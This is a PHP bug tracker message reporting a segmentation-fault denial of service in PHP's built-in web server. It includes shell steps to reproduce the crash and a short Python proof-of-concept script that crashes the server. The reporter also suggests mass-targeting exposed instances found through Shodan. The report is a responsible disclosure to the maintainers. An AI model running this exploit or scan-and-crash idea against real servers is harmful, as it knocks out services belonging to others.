Bug #78047 [Opn]: [DoS] Segmentation fault through HTTP Requests
| From: | michele dot cisternino at protonmail dot com | Date: | Tue, 21 May 2019 18:35:46 +0000 |
| Subject: | Bug #78047 [Opn]: [DoS] Segmentation fault through HTTP Requests | ||
| References: | 1 | Groups: | php.bugs |
| Request: | Send a blank email to php-bugs+get-220928@lists.php.net to get a copy of this message | ||
Edit report at https://bugs.php.net/bug.php?id=78047&edit=1
ID: 78047
User updated by: michele dot cisternino at protonmail dot com
Reported by: michele dot cisternino at protonmail dot com
Summary: [DoS] Segmentation fault through HTTP Requests
Status: Open
Type: Bug
Package: Built-in web server
Operating System: Linux
PHP Version: 7.3Git-2019-05-21 (snap)
Block user comment: N
Private report: Y
New Comment:
Sorry for the late reply.
Yes, the server is usually used for testing purposes, but it can be esposed to the internet as well.
You can launch a simple query on Shodan to find multiple instances of the built-in PHP server
exposed.
An attacker could write a script that launch a request to the Shodan's API, get a list of
vulnerable instances and DoS them all iteratively.
Moreover, In my daily pentest-job, I found this kind of Server not exposed to the internet, but used
internally by the companies.
An attacker, thanks to the exploit I wrote, could cause a continuous DoS.
Moreover, as I already said, the vulnerability could be further investigated to upgrade it to an
RCE.
I hope you understand the criticality of the vulnerability.
Previous Comments:
------------------------------------------------------------------------
[2019-05-21 17:46:40] cmb@php.net
> The vulnerability could be exploited by an attacker [â¦]
No, it can not, because the built-in webserver is for
*development* purposes only.
------------------------------------------------------------------------
[2019-05-21 15:18:51] michele dot cisternino at protonmail dot com
The exploit consists in sending HTTP requests in the following order:
1 - Request the base URL
2 - Request a valid file on the server
3 - Request a non-existent file on the server
4 - Request the base URL
------------------------------------------------------------------------
[2019-05-21 11:45:43] michele dot cisternino at protonmail dot com
Description:
------------
Hi,
I found a vulnerability while I was testing the PHP built-in web server.
The vulnerability could be exploited by an attacker to crash the server causing a segmentation
fault.
I think the vulnerability resides in the way the server handle the HTTP requests.
The steps to reproduce to trigger the segmentation fault are the following:
$ apt install php
$ mkdir server
$ cd server
$ touch file.php
$ php -S 0.0.0.0:80
$ python exploit.py 127.0.0.1 #But could be a remote server as well
You can find the exploit in the "Test script" section.
Further investigations of the issue could lead an attacker to exploit the memory corruption in the
server to get a reverse shell (eg. Buffer overflow).
Anyway, with the actual exploit an attacker could already DoS the server.
Test script:
---------------
import sys
import requests
if len(sys.argv) < 2:
print "[!] Usage: %s TARGET" % sys.argv[0]
exit()
target = sys.argv[1].strip()
if not target.startswith("http://") and not
target.startswith("https://"):
target = "http://" + target
if not target.endswith("/"):
target = target + "/"
filenames = ["", "file.php", "test.php", ""]
print "[*] Sending requests to %s." % target
try:
for filename in filenames:
requests.get(target + filename)
print "The exploit didn't worked."
except requests.exceptions.ConnectionError:
print "The exploit worked!"
Expected result:
----------------
The server crash with "Segmentation fault" error.
------------------------------------------------------------------------
--
Edit this bug report at https://bugs.php.net/bug.php?id=78047&edit=1